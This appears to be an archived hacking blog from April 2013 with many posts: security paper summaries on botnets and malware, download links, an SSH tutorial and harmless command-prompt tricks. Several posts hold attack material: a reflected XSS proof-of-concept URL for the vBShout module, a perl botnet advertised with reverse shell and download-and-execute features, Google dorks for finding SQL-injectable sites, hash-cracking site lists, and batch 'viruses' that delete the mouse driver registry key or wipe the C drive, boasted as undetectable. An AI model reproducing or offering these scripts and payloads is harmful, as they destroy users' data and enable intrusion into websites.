Monday, April 29, 2013

Linux Complete Command


                                        Download Linux Complete Command Reference by J Purcell
                                                                        size: 8.24 MB





Overview:
Part I User Commands 2
Part II System Calls 738
Part III Library Functions 892
Part IV Special Files 1064
Part V File Formats 1104
Part VI Games 1210
Part VII Miscellaneous 1214
Part VIII Administration and Privileged Commands 1258
Part IX Kernel Reference Guide 1424

DOWNLOAD FULL BOOK

SSH AND SCP: HOW TO, TIPS & TRICKS




This tutorial is about SSH and SCP. You will learn how to connect to a remote host and how to copy between hosts. This tutorial also documents a few important differences between the commands.
Difficulty: Basic
Before we start: in this tutorial, you will come across both SSH and ssh. The difference is this: SSH is the general protocol, and ssh is the linux SSH client command.
SSH
SSH is some kind of an abbreviation of Secure SHell. It is a protocol that allows secure connections between computers. In this tutorial, we'll be dealing with the ssh command on Linux, the OpenSSH version. Most Linux distributions feature the OpenSSH client today, but if you want to be sure, have a look at the SSH manpage on your system. You can do this by typing:

---------------------
[rechosen@localhost ~]$ man ssh
--------------------

Sunday, April 28, 2013

vBulletin vBShout Module v6.0.5 - Reflected Cross-Site Scripting ( XSS )


vBulletin vBShout Module v6.0.5 - Reflected Cross-Site Scripting ( XSS )

The last version of vBShout (6.0.5) suffers from Reflected Cross-Site Scripting , located in Search Archive

Update: Released version 6.0.6,but still vulnerable.

Poc: ( required to be logged )

http://www.site.com/vbshout.php?message=XSS&username=&hours=&from[month]=0&from[day]=&from[year] =0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1


http://www.site.com/vbshout.php?message=XSS&s=&do=archive&instanceid=1



Note: HTML Injection and Redirect works too!



Swimming into Trojan and Rootkit GameThief.Win32.Magania Hostile Code



Swimming into Trojan and Rootkit GameThief.Win32.Magania Hostile Code

Trojan-GameThief.Win32.Magania, according to Kaspersky naming convention, monitors the user activities trying to obtain valuable information from the affected user, especially about gaming login accounts. This long tutorial analyze this malware but is also a general document which explains how to analyze a modern nested-dolls malware.

In this paper we will analyse more deeply the structure of this malware, especially the polymorphic part that represents a typical sample of hostile code. Starting from the first load into IDA we can see that Megania's PE structure and Import Table destroyed, this is how looks from WinGraph:

Download PDF 

Direct Link

NET Framework Rootkits


NET Framework Rootkits

The whitepaper .NET Framework rootkits - backdoors inside your framework.pdf covers various ways to develop rootkits for the .NET framework, so that every EXE/DLL that runs on a modified Framework will behave differently than what it's supposed to do. Code reviews will not detect backdoors installed inside the Framework since the payload is not in the code itself, but rather it is inside the Framework implementation. Writing Framework rootkits will enable the attacker to install a reverse shell inside the framework, to steal valuable information, to fixate encryption keys, disable security checks and to perform other nasty things as described in this paper.

This paper also introduces .NET-Sploit 1.0 - a new tool for building MSIL rootkits that will enable the user to inject preloaded/custom payload to the Framework core DLL. 

Download and more info 

Link 1 (Media Fire)

Saturday, April 27, 2013

XSSF - Cross-Site Scripting Framework v.3.0 Released


XSSF - Cross-Site Scripting Framework v.3.0 Released

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing and lawful research purposes.

XSSF allows creating a communication channel with the targeted browser (from a XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers.

XSSF provides a powerfull documented API, which facilitates development of modules and attacks. In addition, its integration into the Metasploit Frameworkallows users to launch MSF browser based exploit easilly from an XSS vulnerability.


XSSF Basics: Install on Kali-1.0 Video Demo : Youtube

Download: From  http://code.google.com

The economics of Botnets






In the past ten years, botnets have evolved from small networks of a dozen PCs controlled from a single C&C (command and control center) into sophisticated distributed systems comprising millions of computers with decentralized control. Why are these enormous zombie networks created? The answer can be given in a single word: money.

A botnet, or zombie network, is a network of computers infected with a malicious program that allows cybercriminals to control the infected machines remotely without the users’ knowledge. Zombie networks have become a source of income for entire groups of cybercriminals. The invariably low cost of maintaining a botnet and the ever diminishing degree of knowledge required to manage one are conducive to growth in popularity and, consequently, the number of botnets.

So how does one start? What does a cybercriminal in need of a botnet do? There are many possibilities, depending on the criminal’s skills. Unfortunately, those who decide to set up a botnet from scratch will have no difficulty finding instructions on the Internet.

You can simply create a new zombie network. This involves infecting computers with a special program called a bot. Bots are malicious programs that unite compromised computers into botnets. If someone who wants to start a ‘business’ has no programming skills, there are plenty of ‘bot for sale’ offers on forums. Obfuscation and encryption of these programs’ code can also be ordered in the same way in order to protect them from detection by antivirus tools. Another option is to steal an existing botnet.

The cybercriminal’s next step is to infect user machines with bot malware. This is done by sending spam, posting messages on user forums and social networks, or via drive-by downloads. Alternatively, the bot itself can include self-replication functionality, like viruses and worms.

Downlaod PDF

Link 1 (Media Fire)

A Study on the Analysis of Netbot and Design of Detection Framework


A Study on the Analysis of Netbot and Design of Detection Framework


Recently, cyber-attacks using attacking tools are steadily increasing on the Internet.Many attackers use botnets for cyber-attacks. Botnet is a kind of network and it consist of malicious codes called bot. Attackers compromise other user's computer with illegal intention to turn the computers into zombies. Thousands to tens of thousands of infected zombies can be connected through a network and remotely controlled by attackers.One of botnets, Netbot is a HTTP-based botnet used for DDoS attack. It is a malicious program that not only infects computers like worms, but also controls systems while exchanging commands with them.

Major functions of Netbot include DDoS attack and backdoor functions such as remote control. The infected computers can be abused for malicious behaviors such as illegally get the private information of users and data stored in the computers, attacking of specific servers and web-sites.Actually, many web-sites such as game item trading sites, internet portals and internet banking web-sites

Downlaod PDF

Link 1 (Media Fire)

Botnet Infiltration using Automatic Protocol Reverse-Engineering


Botnet Infiltration using Automatic Protocol Reverse-Engineering


Enabling Active Botnet Infiltration using Automatic Protocol Reverse-Engineering

Automatic protocol reverse-engineering is important for many security applications,including the analysis and defense against botnets.Understanding the command-and control (C&C) protocol used by a botnet is crucial for anticipating its repertoire of nefarious activity and to enable active botnet infiltration. Frequently, security analysts need to rewrite messages sent and received by a bot in order to contain malicious activity and to provide the botmaster with an illusion of successful and unhampered operation.

Download PDF

Link 1 (Media Fire)

Hybrid Botnet System v.1.0 released


The Hybrid Botnet System contains a perl bot and web administration panel. It uses only one perl module and can easily be compiled with perl2exe to run on a Linux host without perl installed




1. Sleep
2. TCP Storm
3. SYN Storm
4. UDP Storm
5. Delete bot from remote machine
6. Reverse Shell
7. E.R.T.E
8. FTP Crack
9. Download & Execute

Download:  from PacketStormSecurity

More info: http://x1machine.com

The Command Structure of the Aurora Botnet


The Command Structure of the Aurora Botnet


Following the public disclosures of electronic attacks launched against Google and several other businesses, subsequently referred to as “Operation Aurora”,Damballa conducted detailed analysis to confirm that existing customers were already protected and to ascertain the sophistication of the criminal operators behind the botnet.There has been much media attention and speculation as to the nature of the attacks.
Multiple publications have covered individual aspects of the threat – in particular detailed analysis of forensically recovered malware and explanations of the Advanced Persistent Threat (APT).

Download PDF

Link 1 (Media Fire)

Mumba Botnet Disclosed


Mumba Botnet Disclosed

The Mumba botnet, so called because of some funky attributes our researchers found on the server, was created by one of the most sophisticated group of cybercriminals on the internet known as the Avalanche Group.

This group has perfected a mass-production system for deploying phishing sites and data stealing malware. Mumba uses the latest version of Zeus, currently one of the most common malwares and infected 55,000 computers worldwide.Of course, the longer cyber criminals can keep their botnets out in the open the more money they make, so they invest a great deal of time and resources in protecting their systems and hiding their servers from detection by security researchers and law enforcement officials.

This was certainly the case with the Mumba botnet, which was extremely effective at harvesting web users data. The full report, which can be downloaded from this blog, shows that the Mumba botnet was responsible for stealing more than 60 gigabytes of personal data from people, including their details from social networking websites, bank account details, credit card numbers and emails.
The United States had the highest share of PCs infected by the Mumba botnet (33 percent), followed by Germany (17 percent), Spain (7 percent), United Kingdom (6 percent), Mexico and Canada (both 5 percent).

Download PDF

Link 1 (MediaFire)

Friday, April 26, 2013

The Botnet Chronicles


The Botnet Chronicles

A Journey to Infamy

Botnets are considered one of the most prevalent and dangerous threats lurking on the Web today.The damage they cause can range from information theft and malware infection to fraud and other crimes.A botnet refers to a network of bots or zombie computers widely used for malicious criminal activities like spamming, distributed denial-ofservice (DDoS) attacks,and/or spreading FAKEAV malware variants.A botnet connects to command-and-control (C&C) servers,enabling a bot master or controller to make updates and to add new components to it.This white paper examines where the first botnets came from and how they have evolved over the past 10 years to become some of the biggest cybercrime perpetrators on the Web at present.

Download PDF

Link 1 (Media Fire)

Koobface: Inside a Crimeware Network


Koobface: Inside a Crimeware Network


Introduction
There are numerous computer systems around the world that are under the control of malicious actors.These compromised computers,often known as zombies,form a botnet that receives and executes commands from botnet operators who harvest passwords,credit card numbers,and sensitive information from the zombies.Botnet operators also put the “zombies” to work by forcing them to send spam messages,create fraudulent accounts,and host malicious files.Rather than relying on sophisticated technical exploits,some botnet operators simply trick users into compromising themselves.Through fake Web sites,users are encouraged to download malicious software masquerading as benign.Sometimes,these fake,malicious Web sites are sent to users by their contacts on social networking sites.The rise of social networking tools has given attackers a platform to exploit the trust that individuals have in one another.People are much more likely to execute a malicious file if it has been sent to them by someone they know and trust.The information that individuals post online and the interests contained within their profile information can also be used to lure individuals into executing malicious software.Koobface is a botnet that leverages social networking platforms to propagate.

The operators of the botnet(known as Ali Baba and 40 LLC)have developed a system that uses social networking platforms,such as Bebo,Facebook,Friendster,Fubar,Hi5,MySpace,Netlog,Tagged,Twitter,and Yearbook,to send messages containing malicious links.These links are often concealed using the URL shortening service bit.ly and sometimes redirects to Blogspot blogs that redirect users to false YouTube pages hosted on compromised Web servers. These pages encourage users to download malicious software masquerading as a video codec or a software upgrade.Koobface also uses search engine optimization (SEO) techniques that allow these malicious sites to be listed highly in search engine results for popular search terms.

Download PDF

Link 1 (Media Fire)

Symantec Report on Attack Kits and Malicious Websites


Symantec Report on Attack Kits and Malicious Websites

Attack toolkits are bundles of malicious code tools used to facilitate the launch of concerted and widespread attacks on networked computers. Also known as crimeware, these kits are usually composed of prewritten malicious code for exploiting vulnerabilities along with various tools to customize, deploy, and automate widespread attacks, such as command-and-control (C&C) server administration tools.

As with a majority of malicious code in the threat landscape, attack kits are typically used to enable the theft of sensitive information or to convert compromised computers into a network of zombie bots (botnet) in order to mount additional attacks. These kits are advertised and sold in the online underground economy—a black market of servers and forums used to advertise and trade stolen information and services.
Symantec has found that attack kits are significantly advancing the evolution of cybercrime into a self-sustaining, profitable, and increasingly organized economic model worth millions of dollars.

Download PDF

Link 1 (Media Fire)

Botnets: Measurement, Detection, Disinfection and Defence


“Botnets: Measurement, Detection, Disinfection and Defence” is a comprehensive report on how to assess botnet threats and how to neutralise them. It is survey and analysis of methods for measuring botnet size and how best to assess the threat posed by botnets to different stakeholders. It includes a comprehensive set of 25 different types of best-practices to measure, detect and defend against botnets from all angles. The countermeasures are divided into 3 main areas: neutralising existing botnets, preventing new infections and minimising the profitability of cybercrime using botnets. The recommendations cover legal, policy and technical aspects of the fight against botnets and give targeted recommendations for different groups.

Download PDF

Link 1 (Media Fire)

What is Zeus - Technical paper


What is Zeus - Technical paper

Zeus or Zbot is one of the most notorious and widely-spread information stealing Trojans in existence. Zeus is primarily targeted at financial data theft; its effectiveness has lead to the loss of millions worldwide. The spectrum of those impacted by Zbot infections ranges from individuals who have had their banking details compromised, to large public order departments of prominent western governments.

We will explore the various components of the Zeus kit from the Builder through to the configuration file; examine in detail the functionality and behaviour of the Zbot binary; and assess emerging and future trends in the Zeus world.

Download  PDF

Link 1 (Media Fire)

Direct Link

AMAROK 2.4.2 BETA 1 "NIGHTSHADE" RELEASED




This has been a busy spring and early summer in Amarok-land. Developers met up in Randa, Switzerland and sprinted with a lot of other KDE teams, including KDE Multimedia. Besides lots of good times, much coding progress and bugfixing was done too. You will immediately notice a new streamlined look, and some nice background graphics. The other big change is in dynamic playlists.
One we have been waiting for: drag and drop on Collections, to copy or move within Local Music, and also directly from the Playlist. We also got patches for various bugs and wishes: one can now configure the names of Podcast episodes, thanks to Sandeep Raghuraman, and automatic scrolling in the Lyrics applet is possible, thanks to Jan Gerrit Marker. Good news for classical music listeners, you now have the option to scrobble the composer as artist in Last.fm, thanks to Nicholas Wilson.
We also have an updated dynamic playlist which should be easier to understand. Some of the functionality changes are: New AlbumPlay example playlist, a Quiz-play bias that will pick a song that starts with the same character the last one ended with, preventing duplicate tracks.
And of course we have quite a few bug-fixes, and changes under the skin. The changelog below gives a fairly complete overview of the changes in this beta release. Please help us test it and get it ready for prime-time.


Features


-Made Amarok compile with the Clang LLVM frontend.
-Enable drag and drop on collections to copy/move within Local Music and directly from the playlist.
-Added KNotify scripting interface.
-Make podcast episodes download filename configurable. Patch by Sandeep Raghuraman.
-Automatic scrolling in lyrics applet (Thanks to Jan Gerrit Marker)
-Option to scrobble composer as artist to Last.fm (Thanks to Nicholas Wilson)
-Option to hide the OSD if another window is taking the full screen


Changes

-Again write back ratings only if option is selected.
-Moved the queue-editor action to the main menu under playlist to save space. Queue editor now has a     shortcut: Meta+U.
-Removed the redo action from the playlist toolbar to make it less wide.
-Made some playlist toolbar actions collapse into a menu button for use on small screens.
-Removed the statusbar. Moved progress info & messages to the Media Sources dock.
-Removed the preview button and checkbox from the organize collection dialog.
-General user interface cleanup (addition of browser widget backgrounds, etc.)
-Removed the add button in the context toolbar. Applet explorer is opened on config.
-Easier to understand Dynamic playlists
-Made Amarok depend ffmpeg-0.6 or newer.
-Use KImageCache if possible (kdelibs 4.5.0 and later), which should reduce the number of cache-related crashes.


 Bugfixes

-Don't let the album applet freeze Amarok for ages on track change.
-Fixed cover fetching from Google Images.
-Fixed a crash in the equalizer dialog when selecting "Off".
-Fix finalization of track copy process to media device collections.
-Fixed crash on MusicBrainz search.
-Avoid crash in ContextView when accessing Plasma::Applet::view().
-Fixed playlist tooltip getting too tall for multiline comments.
-Made equalizer keywords (dB,kHz,...) translatable.
-Made equalizer preset names translatable.
-Fixed runtime error reporting of scripts.
-Fixed "Happy" moodbar theme.
-Fixed crash for invalid scripts trying to be stopped by the manager.
-Fixed collection menu items ordering.
-Fixed top level podcast location setting.
-Fixed double-clicking in collection using left-handed mouse setting.

FREE VPN FOR ALL


VPN On Demand service adds numerous benefits to your internet experience:

Use the internet without restrictions.
Secure your internet connection.
Fast connection speeds.
Easy to setup.


How to apply to a free private beta account?

Send an email to promotion at vpnod.com with subject vpnod

and you will get an instant reply with access credentials to VPNoD service.

Windows Setup Instructions

2- Select Set up a connection or network

3- Select Connect to a workplace and click Next

4- Select Use my Internet Connection (VPN)

NOTE: If prompted for "Do you want to use a connection that you already have?", select No, create a new connection and click Next.

5- In the Internet Address: field, type vpn.vpnod.com

6- In the Destination Name: field, type VPNOD.

7- In the User Name: field, type your VPNOD username. Your VPNOD username which was sent to you earlier in an email.

http://www.vpnod.com

8- In the Password: field, type your VPNOD password.

9- Click the Create button and then click the Close button.

10- To connect to the VPN server after creating the VPN Connection, click on Start, then Connect to.

11- Select the VPN connection in the window and click Connect.

Note: It does keep logs but not for long time.

MD5 Cracking websites








How To Decrypt MD5 Hash


* http://www.md5-db.com/index.php
* http://plain-text.info/add/
* http://www.tmto.org/
* https://hashcracking.ru/
* http://hashcrack.com/
* http://www.cryptohaze.com/addhashes.php
* http://md5decryption.com/
* http://authsecu.com/decrypter-dechifr-hash-md5.php
* http://hash.insidepro.com/
* http://md5decrypter.com/
* http://md5pass.info/
* http://crackfor.me/
* http://www.xmd5.org/
* http://socialware.ru/md5_crack.php
* http://md5.my-addr.com/md5_decrypt-m...coder_tool.php
* http://passcracking.com
* http://www.md5this.com
* http://www.md5this.com/submit-your-hash/index.php
* http://md5.benramsey.com
* http://nz.md5.crysm.net
* http://us.md5.crysm.net
* http://www.xmd5.org
* http://gdataonline.com
* http://www.hashchecker.com
* http://passcracking.ru
* http://www.milw0rm.com/md5
* http://plain-text.info
* http://www.securitystats.com/tools/hashcrack.php
* http://www.schwett.com/md5/
* http://passcrack.spb.ru/
* http://shm.pl/md5/
* http://www.tydal.nu/article/md5-cr*ck/
* http://ivdb.org/search/md5/
* http://md5.netsons.org/
* http://md5.c.la/
* http://www.jock-security.com/md5_database/?page=cr*ck
* http://c4p-sl0ck.dyndns.org/cracker.php
* http://www.blackfiresecurity.com/tools/md5lib.php


How to Decrypt SHA1 Hash

* http://passcrack.spb.ru/
* http://www.hashreverse.com/
* http://rainbowcrack.com/
* http://www.md5encryption.com/
* http://www.shalookup.com/
* http://md5.rednoize.com/
* http://c4p-sl0ck.dyndns.org/cracker.php
* http://www.tmto.org/
* http://linardy.com/md5.php
* http://www.gdataonline.com/seekhash.php
* https://www.w4ck1ng.com/cracker/
* http://search.cpan.org/~blwood/digest-md5-reverse-1.3/
* http://shm.pl/md5/
* http://www.neeao.com/md5/
* http://md5.benramsey.com/
* http://www.md5decrypt.com/
* http://md5.khrone.pl/
* http://www.csthis.com/md5/index.php
* http://www.md5decrypter.com/
* http://www.md5encryption.com/
* http://www.md5database.net/
* http://md5.xpzone.de/
* http://www.hashreverse.com/
* http://alimamed.pp.ru/md5/
* http://md5crack.it-helpnet.de/index.php?op=add
* http://shm.hard-core.pl/md5/
* http://rainbowcrack.com/
* http://md5.c.la/
* http://www.md5-db.com/index.php
* http://md5.idiobase.de/
* http://md5search.deerme.org/
* http://sha1search.com/


So friends, I hope above sites will help you to decrypt MD5 and SHA1 hash and SHA1 / MD5 password using above sites.

Enjoy MD5 and MD4 decrypter sites to decrypt MD5 and MD4 password hashes...

Kali Linux Has Been Released



S
even years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.

After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date.


Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux. Trying to list all the new features and possibilities that are now available in Kali would be an impossible task on this single page. We therefore invite you to visit our new Kali Linux Website and Kali Linux Documentation site to experience the goodness of Kali for yourself.

We are extremely excited about the future of the distribution and we can’t wait to see what the BackTrack community will do with Kali. Sign up in the new Kali Forums and join us in IRC in #kali-linux on irc.freenode.net and help us usher in this new era.
most advanced and state of the art penetration testing distribution available. Available in 32 bit, 64 bit, and ARM flavors.

Download Kali Linux 1.0

Have Fun Playing Snake Game On Youtube


As you know snake is one of the oldest but also most popular and fun playing game, which can now be played on youtube with a simple trick.You can have fun playing snake game while your video streams.

How To Play ?
1. Go to youtube and select any video.
2. While video is streaming on youtube press left button of mouse and press up arrow key .
3. Now the streaming circle will start to move like a snake.
4. Play this snake game with arrow keys.

Download Youtube Videos Without Any Software


This is simple youtube trick which will allow you to download any youtube videoswithout any software or programme and in many different video formats such as mpeg4, 3gp, hd and many more from within the youtube site.


How To Download Youtube Videos ?

1. First Go to Youtube Homepage.

2. Then select the video you want to download. I will demonstrate with video url given below.

http://www.youtube.com/watch?v=_JAa3NvP6f4

Now add save or ss or kick before youtube and press enter.



3. After adding any of the above keyword the above link will become.
http://www.saveyoutube.com/watch?v=_JAa3NvP6f4
Or
http://www.ssyoutube.com/watch?v=_JAa3NvP6f4
Or
http://www.kickyoutube.com/watch?v=_JAa3NvP6f4 



4. Now you will be redirected to a new page from where you can download youtubevideos in any format of your choice. You may also download only the soundtrack of the video in mp3 format.

Thursday, April 25, 2013


RAT stands for Remote AccessTrojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basicly anything with your computer. Using RAT hacker can install keyloggers and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about whathacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.



----------------------------
What is RAT ?

----------------------------
As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect. So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you over the mail or in chat room.


---------------------------------------------------
What You can do with RAT ?
---------------------------------------------------

Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:


Infecting Files
Installing Keyloggers
Controlling Computer
Remotely start webcam, sounds, movies etc
Using your PC to attack Website (DDOS)
View Screen
---------------------------------------------
Harmless RAT or Good RAT

---------------------------------------------
As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one's computer with his permission for file transfer, sharing your screen and more.


-------------------------------------------
Some Commonly Used RAT
-------------------------------------------


ProRAT
CyberGate RAT
DarkComet RAT

How To Install Backtrack 5 On Virtual Machine ?



If you want to experience and experiment with backtrack 5 hacking tools such as kismet, metasploit etc. Then today i am going to show you how you can install and run Backtrack 5 Operating System inside a virtual machine(VirtualBox). It works on all computers running any operating system such as Windows Xp, Windows 7, Or Mac Os X. So lets get stared installing backtrack 5 on your operating system.

Downloading Softwares to install Backtrack on Virtual Box

List Of Google Dorks For Sql Injection



I had previously share with you guys List of  good proxy sites to surf anonymously on the internet and today i am sharing with you a list of google dorks for sql injection which is one of most used method to hack a website.



List Of Google Dorks


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=

Hackers Evolution Game Download

Finding Ip Address Of A Website Using Command Prompt Or CMD



In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.




How to find IP ?

1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.


3. It will take less then a second and come up with the results as shown below.



In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

Watch Star Wars Movie In CMD



    This is very intersting and amazing command prompt trick which will play star wars movie in the command prompt or cmd. Below are complete steps with screen shots for this trick with. Without wasting time lets gets started.


       1. Go to start  Run and type in cmd and press enter
       2. Now type in telnet as shown below and press enter.


3. After that enter o as shown below and press enter.


  4. Next enter towel.blinkenlights.nl as shown below and press enter.


5. Now star wars movie will start playing on your command prompt


Learn Batch Programming (Video Tutorials)


Batch File programming is really really easy then any other programming language. You could do cool stuffs with batch file. I had previously posted about Matrix effect and Mouse virus which are created using batch file programming. I came across batch file programming videos on youtube so i am sharing with you all. It will hardly take your 30 minutes and you will learn a new language. This are 3 begineers videos if you like it i will find more for you guys. So lets get started learning batch programming.


Introduction To Batch Files








Part 2







Matrix Effect Using Notepad



  This is amazing notepad trick which will display matrix effect like you might have seen in movies, that is numbers flashes in green colour. Basically we will be creating a small batch file in notepad.

Go to Notepad and copy below codes


@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start




Save this file as matrix.bat 
Now open this file as see matrix effect on your screen.

Wednesday, April 24, 2013

Make A Virus That Disable Mouse


I had previously posted on making different batch file like matrix effect,opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouseso think before trying it on yourself.

Open Notepad and copy below codes :

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------




Save this file as  virus.bat

Done you just created your virus.





Learn To Make Dangerous Virus In A Minute



In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

1. Open Notepad and copy below code into it.


@Echo off
Del C:\ *.* |y




2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Is You Antivirus Working Perfect ?



This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.

First open Notepad and copy below code into it.


X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Save the file as virus.exe

CEHV7 INSTRUCTOR SLIDES

                                                        CEH v7 Instructor Slides
                                                         English | PDF | 384MB


Course Description & Overview
NEWS ALERT! Secure Ninja Chosen by EC-Council to Launch CEH v7 Training in Washington DC.
Secure Ninja was selected out of 450 authorized EC-Council training partners worldwide to be the first and only training company in the WashingtonDC and Virginia area to offer the much awaited CEH v7 release training at their state of the art training facility in AlexandriaVA on March 142011.
All CEH v7 Launch attendees are entitled to the following benefits :
- Be amongst the first in the world to experience the all-new CEH v7
- Receive exclusive CEH v7 commemorativelimited editonMetal certificate of attendance.
- Second Pass: Free Second Pass Vouchers exclusive commemorative metal plated certificate of attendance
- VVIP access to Hacker Halted and TakeDownCon Conferences worth USD 1,999 and USD 999 each
- Opportunity to be showcased as Roll of Honor on Secure Ninja & EC-Council website.


http://secureninja.com/course/23/CEH-Certified-Ethical-Hacker/


DOWNLOAD
PART-1
PART-2
PART-3
PART-4

CEH V7 INSTRUCTOR SLIDES



These slides are most probably made from screenshots of the official ones. notice that they have not the same size.


Description :

EC-Council releases the most advanced ethical hacking program in the world. This much anticipated version was designed by hackers and security researchers. CEH v7 is a revolutionary training program that combines class metrics, advance lab environment, cutting edge hacking techniques and excellent presentation materials. EC-Council has spent several years in developing this version.
The Certified Ethical Hacker courseware has undergone tremendous improvement from its predecessor. We have invested 4 times the regular investment in the research and development since the last release, and have given CEHv7 a complete makeover.

The new version is a breakaway from earlier releases with more emphasis on techniques and methodologies, which attackers may use to carry out possible attacks against system/networks.

Picture speaks thousand words and we at EC-Council have enforced the saying by practicing it. The instructor slides and student manuals in CEHv7 has it all. The new version empowers the instructor with flawless flow and outstanding diagrammatic representation of the hacking techniques, which makes it easier to teach and enables students to understand the concepts better.
CEHv7 provides a comprehensive ethical hacking and network security-training program to meet the standards of highly skilled security professionals. Hundreds of SMEs and authors have contributed towards the content presented in the CEHv7 courseware. Latest tools and exploits uncovered from the underground community are featured in the new package. Our researchers have invested thousands of man hours researching the latest trends and uncovering the covert techniques used by the underground community.

Modules :

CEHv7 Module 01 Introduction to Ethical Hacking.pdf
CEHv7 Module 02 Footprinting and Reconnaissance.pdf
CEHv7 Module 03 Scanning Networks.pdf
CEHv7 Module 04 Enumeration.pdf
CEHv7 Module 05 System Hacking.pdf
CEHv7 Module 06 Trojans and Backdoors.pdf
CEHv7 Module 07 Viruses and Worms.pdf
CEHv7 Module 08 Sniffers.pdf
CEHv7 Module 09 Social Engineering.pdf
CEHv7 Module 10 Denial of Service.pdf
CEHv7 Module 11 Session Hijacking.pdf
CEHv7 Module 12 Hacking Webservers.pdf
CEHv7 Module 13 Hacking Web Applications.pdf
CEHv7 Module 14 SQL Injection.pdf
CEHv7 Module 15 Hacking Wireless Networks.pdf
CEHv7 Module 16 Evading IDS, Firewalls, and Honeypots
CEHv7 Module 17 Buffer Overflow.pdf
CEHv7 Module 18 Cryptography.pdf
CEHv7 Module 19 Penetration Testing.pdf


Download 

Link 1 (Media Fire)

ETHICAL HACKING: AN INTRODUCTION


Whenever term hacker comes before many people consider it as a guy sitting inside a room or garage with a bottle or beer and a Laptop or Desktop doing wonders on click of buttons. But the reality check is hacking is not that easy as portrayed in movies and television and term hacker doesn't mean a computer criminal.

So here first of all we'll clear all our misconceptions related to words hackers and hacking.

From Where This Word Came:

The word hacking has history in late 1960's, the time when computers were nothing but mighty pieces of machines and a computer just meant a machine that can compute. Electrical and Electronics geeks used to optimize circuits to make any system/circuit work faster, better and reliably. The job they used to do on circuits was known as hack. With time computer geeks also started finding way out to optimize their system to work better so in fact hacking was nothing but always a kind of reverse engineering. With time in professional world a word hacker got meaning, a person who is highly skilled in hardware, software and networking components. Then movies started portraying hackers do only dirty works and hence today the word hacker has a negative face according to people. No matter how the word met to a dreadful end a hacker always had all qualities that was first put forward in its definition may the be criminal or ethical. Criminal hackers are also known as Crackers.

Types Of Hackers:

White Hats: White hat hackers are good guys who use their hacking skills for defensive purposes. Organizations and industries pay them high salaries to protect their systems and networks from intrusion.

Black Hats: Black hats are actually bad guys in filed. Their main job is to breach security and make money. They make money by using their hacking skills for offensive purposes.

Grey Hats: Gray hats are hackers who work for offensive and defensive purposes depending on situations. They are hired by people to intrude and protect systems.

Hactivist: A hacktivist is kinda hacker who thinks hacking can bring out some social changes and hacks government and organizations to show his discomfort over some trivial issues.

Suicide Hackers: Suicide hackers are those who hack for some purpose and even don't bother to suffer long term jail due to their activities. They can be bad as well as good.

Script Kiddie: A script kiddie is a person who boasts breaking system using scripts and codes written by others though he hardly knows what the code does.

Phreak: It is a person who tries to intrude systems for fun or malicious personal activities. Mostly they are children of age 12-15 who don't even know wrong consequences of hacking.

Types Of Hacking:

Local Hacking: This type of hacking is done when a hacker has full access to the system to implant a virus, keylogger and RATs

Remote Hacking: Remote hacking is done on a remote system using Internet.

Social Engineering: Social Engineering is kinda interacting skill that a hacker uses to manipulate people giving out sensitive information. Its kinda trick done using good verbal, social skills and understanding.

Terminologies Used Under Hacking:

Threat: A threat is an environment or situation that could lead to a potential breach of security. Ethical hackers look for and prioritize threats when performing a security analysis.

An Exploit: An exploit is a piece of software that takes advantage of a bug, glitch, or vulnerability, leading to unauthorized access, privilege escalation, or denial of service on a computer system.
Vulnerability: A vulnerability is an existence of a software flaw, logic design, or implementation error that can lead to an unexpected and undesirable event executing bad or damaging instructions to the system. In easy word vulnerability is weakness in system.

Payload: Payload is agent that helps in taking advantage of vulnerability in remote hacking.

Attack: An attack occurs when a system is compromised based on a vulnerability.

